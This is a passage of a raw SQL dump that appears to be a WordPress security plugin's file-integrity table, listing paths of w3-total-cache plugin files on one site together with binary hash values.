aݠ%aD!,\nP8','',0,'?'),('^ p,g_Mh[a','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Internal/IBlob.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Internal/IBlob.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ra t','܉3Y۱G\0%ǸZz\"P<','',0,'?'),('rɘAd C1','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/AccessCondition.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/AccessCondition.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(wfOuLJNM)','Be/ɔ06XX40lUϩ4','',0,'?'),('OuIދvۥ','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/AccessPolicy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/AccessPolicy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w{\"Ř','MZ̖THj%w2[_GF_','',0,'?'),('-;`|ie.) ','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/AcquireLeaseOptions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/AcquireLeaseOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|e4btG','=6˛#Ԍ!=6T^ynL{','',0,'?'),('zpv^s','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/AcquireLeaseResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/AcquireLeaseResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w!c>H>|',',~óp3o3(jdDB(qK','',0,'?'),('/\\:Rj#','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/Blob.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/Blob.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ހ\"گ`)8s',' 6i0h\\sdLPd\0%cnH4D','',0,'?'),('_o7>P','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/BlobBlockType.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/BlobBlockType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g?jm#B?p','e,Cٷ9f3n2\\iPb9^Ԅ','',0,'?'),('`J:v.O','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/BreakLeaseResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/BreakLeaseResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n\Zfh','6\\ _[=\0jYp','',0,'?'),('X','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/CommitBlobBlocksOptions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/CommitBlobBlocksOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I%/;@1{','*[;hS引m@\rQbw','',0,'?'),('Dv3d[vfD','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/Container.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/Container.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{_)!Ğa','j1\r\ZhH#]ɷ2f󒫩j7G@','',0,'?'),('=ǝ]J','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ContainerACL.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ContainerACL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' wa3Gn','Ϛ~\05e?HX_lm2.n_.','',0,'?'),('5.u,6ES','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ContainerProperties.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ContainerProperties.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ko{y?','n.DLjUn KE@xcW]@','',0,'?'),('dW?h7\n)','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/CreateBlobPagesOptions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/CreateBlobPagesOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jf+|WT','<~ *:yO?v(iVBǚ^M','',0,'?'),('Po[X&:vW','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/CreateBlobPagesResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/CreateBlobPagesResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K\r>˚VDV','l z%; zPQgܨlb','',0,'?'),('Hir\n>kow','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/CreateBlobSnapshotOptions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/CreateBlobSnapshotOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SCr!|su4UP','ܯҹO~v\'>','',0,'?'),('0i$%pU','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/GetBlobResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/GetBlobResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y}ȸy5','X4^*l-T̽?p@?','',0,'?'),('%GK X_','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/GetContainerACLResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/GetContainerACLResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >\Ze\0KS',';% i8@3古ɭo\0WkzX ','',0,'?'),('LjINz','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/GetContainerPropertiesResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/GetContainerPropertiesResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oz*i:I2TRm',' uqI\Z „FqaE67DZ ','',0,'?'),('GÃ<,o{ ','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/LeaseMode.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/LeaseMode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qAA{9Kf#','%- 96br+W\'>˳/ȋH/','',0,'?'),('— _?q&','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListBlobBlocksOptions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListBlobBlocksOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zeڇ.e~',']/)~/ư*lVHEϽ\Z_','',0,'?'),('?E1,','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListBlobsOptions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListBlobsOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!57ʜpM[','-@\Z:Qʮ֓Gnj ݎ','',0,'?'),('?)\"%8S؈.h','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListBlobsResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListBlobsResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wOZ-󨷋>','oOUjS)FTUw?5[Tug','',0,'?'),('lKS@_I6','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListContainersOptions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListContainersOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Џi54IS','Z)K~Nuj xGm','',0,'?'),('֜bau','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListContainersResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListContainersResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_k :@U#2','Mh?aZZ0yxxxXm<{F','',0,'?'),('e64F\'/\'','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListPageBlobRangesOptions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListPageBlobRangesOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܯ|&l0;?','\" Y4>Ao4Y9)','',0,'?'),('~ïGp','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListPageBlobRangesResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/ListPageBlobRangesResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\n0)gU\"','!C\nޫ끈.3fӃ[','',0,'?'),('j?ShO.','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/PageRange.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/PageRange.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#&ut#_','Ts5nڝ=97Yr>B\n푗K','',0,'?'),(')ofHhNcԉ','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/PageWriteOption.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/PageWriteOption.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lj97Hʹ',' OA_Eͭ,Fq,T\Z;Q3','',0,'?'),('6@!WIV{ڳI_','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/PublicAccessType.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/PublicAccessType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\" 3חGJ\ZB','H*.VEGF$^مIF{m>E<','',0,'?'),('3o))q','',0,'?'),('Pu+jn{~c','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/SetContainerMetadataOptions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/SetContainerMetadataOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k%aT1 ','%J t','',0,'?'),('NCɂF=>\Z','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/SignedIdentifier.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Blob/Models/SignedIdentifier.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9^jw&A','n,z|lQ)lcJoB<','',0,'?'),(')N\0~2u','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/CloudConfigurationManager.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/CloudConfigurationManager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s۫=ʒ','a&{TunǏߊXHᡛw <','',0,'?'),('ΪW{0X','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Authentication/IAuthScheme.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Authentication/IAuthScheme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y\rU`\nrtϟ KBG','B Nn( *Yy 7P','',0,'?'),('>z*})14c','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Authentication/SharedKeyAuthScheme.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Authentication/SharedKeyAuthScheme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*#`Jط0\n?','qmmL4 l2>+Jp2Y4_','',0,'?'),('\'c=]Uۄ\\,','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Authentication/StorageAuthScheme.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Authentication/StorageAuthScheme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0mDt?','`0n{EVI5/#e,N7)}','',0,'?'),('f~){t]','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Authentication/TableSharedKeyLiteAuthScheme.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Authentication/TableSharedKeyLiteAuthScheme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o5Mmg<`','Ggeỿ ߿uB|@wT','',0,'?'),(' (ZU','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/ConnectionStringParser.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/ConnectionStringParser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6~B@Ǟ*_6',':=h08\0_TE0~\"c[','',0,'?'),('>(o','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/ConnectionStringSource.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/ConnectionStringSource.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\0nFdl',']:\\7!j0>J/','',0,'?'),('IȜJ 7','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/FilterableService.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/FilterableService.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'~\\ϴ˛','cU/?.L=l]6\r*]x<3','',0,'?'),('*P\nD)>A','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/AuthenticationFilter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/AuthenticationFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x|qMqO','r3N\\\0&ew=ҽ{rAHE4','',0,'?'),('fZqɩb35','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/DateFilter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/DateFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LQ\0M9_Rn- QP','E]=\\[{9)%\rv9Z \0\\','',0,'?'),('ݟr?','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/ExponentialRetryPolicy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/ExponentialRetryPolicy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';@v?矃/','6ʌ l?ax}:\r3N','',0,'?'),('4~3s{h;y{J','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/HeadersFilter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/HeadersFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5ve+-','X<~$Ʀ}Th74{ǯ','',0,'?'),('rnLs^','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/RetryPolicy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/RetryPolicy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{Vs*k!Ʊ','<\0piXՈ`oJgPQm*Q','',0,'?'),('=K.osJ','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/RetryPolicyFilter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Filters/RetryPolicyFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܕzU<8ߜH','oG?\0vJ`gvBa\ZQ~kNU','',0,'?'),(',\')BshVk','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Http/HttpCallContext.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Http/HttpCallContext.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aWUdbEW','Ce\r* p$e$}\">X9','',0,'?'),('?p{N㧊U','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/HttpFormatter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/HttpFormatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':o3hd`','qDOc\\HLr\ZOB1J','',0,'?'),('w\'D Bb','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/IServiceFilter.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/IServiceFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?otAe}','{c-6gL.?ZP/','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/ServiceRestProxy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/ServiceRestProxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_uMY_^','fCb)#EQO`I}a)}z','',0,'?'),('>#1$ݩJ:K','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/ServiceSettings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/ServiceSettings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rpt*TLg','խ[Xmv﷍< E','',0,'?'),('ҎϋsvH','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/StorageServiceSettings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/StorageServiceSettings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_B eJTq','u.>\0:qM)1Zu-g޾','',0,'?'),('MO{a','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Utilities.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Utilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~s8F','iXSfjA l6VN=8*vahV','',0,'?'),('/dZ|GV','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Validate.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Internal/Validate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FآzFx','ɱ`qd-33XIjŹ%s','',0,'?'),('\'}MYmU','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Models/GetServicePropertiesResult.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Models/GetServicePropertiesResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mB_K7D','= OfNJ^=%J]:$Eԯ9e','',0,'?'),('Y\rљѾٸ0&','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Models/Logging.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Models/Logging.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \rwPmrx','SEO/z9x{:8rp:@','',0,'?'),('NSKW M\"OG','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Models/Metrics.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Models/Metrics.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{m1mf','cW(<%kheW Cl','',0,'?'),('ص2poG','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Models/RetentionPolicy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Models/RetentionPolicy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','muQnq_bt','Z(X()lD\ZVot60;l','',0,'?'),(']\0A~(\n,\ri','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Models/ServiceProperties.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/Models/ServiceProperties.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',2~|y*`7GU','Ƿ^SUEnȰ]rD_G','',0,'?'),('<2K .l','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/ServiceException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/ServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\9}\ZwU',' .O&%:]Q','',0,'?'),('-gN3lϒ','wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/ServicesBuilder.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/MicrosoftAzureStorage/Common/ServicesBuilder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nYGj% QJzg','7t07Q[K(^M \r3\Z','',0,'?'),('pd״T-⋳%\'H','wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/MessageInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/MessageInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[KB5CZ㐢Ҵ','i>,N;\"kD-}tzJ','',0,'?'),('fSqd9*','wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/RequestInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/RequestInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZVis6','aؽUZ\"(5sg\0uYD[','',0,'?'),('oj5:(ֹ$O2','wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/ResponseInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/ResponseInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':.W%7@ñ','q@w4(]r4w~#\r\Z','',0,'?'),('y%\".','wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/ServerRequestInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/ServerRequestInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hLDM)','0d?dñSad ?ޏ*d','',0,'?'),('JLceo@z','wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/StreamInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/StreamInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z85zT','Ŧ!\ZE|sIg ߘV4qN','',0,'?'),('Ja_y\"!>V','wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/UploadedFileInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/UploadedFileInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','00qL D\0&','߸ 3k=4DS/ofji','',0,'?'),(' ԟ͆bOl','wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/UriInterface.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/PsrHttpMessage/UriInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w:(H','.x2ж=2\"#ЅJ!{i Q','',0,'?'),('OboKϹ-4','wp-content/plugins/w3-total-cache/lib/Azure/loader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/Azure/loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\\\\MU','9,\'%ߠ&?_\ne','',0,'?'),('4f!j @ٿW','wp-content/plugins/w3-total-cache/lib/CSSTidy/class.csstidy.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/CSSTidy/class.csstidy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mf =+U8\"','7cbg! +\ZhMxV>&*;F','',0,'?'),('{2e_8aʍt','wp-content/plugins/w3-total-cache/lib/CSSTidy/class.csstidy_optimise.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/CSSTidy/class.csstidy_optimise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vQ1UWۧނ?','/ݕ!j(!NgҮ#`#\'4','',0,'?'),('(1LU(1ݞ','wp-content/plugins/w3-total-cache/lib/CSSTidy/class.csstidy_print.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/CSSTidy/class.csstidy_print.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ج4qCVD{- lKjo]iD/\n','',0,'?'),('Cch_k','wp-content/plugins/w3-total-cache/lib/CSSTidy/data.inc.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/CSSTidy/data.inc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%C/2v4A','D(2Z,#p\"ori(zR8','',0,'?'),('`h3zIVMC','wp-content/plugins/w3-total-cache/lib/CSSTidy/index.html','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/lib/CSSTidy/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0 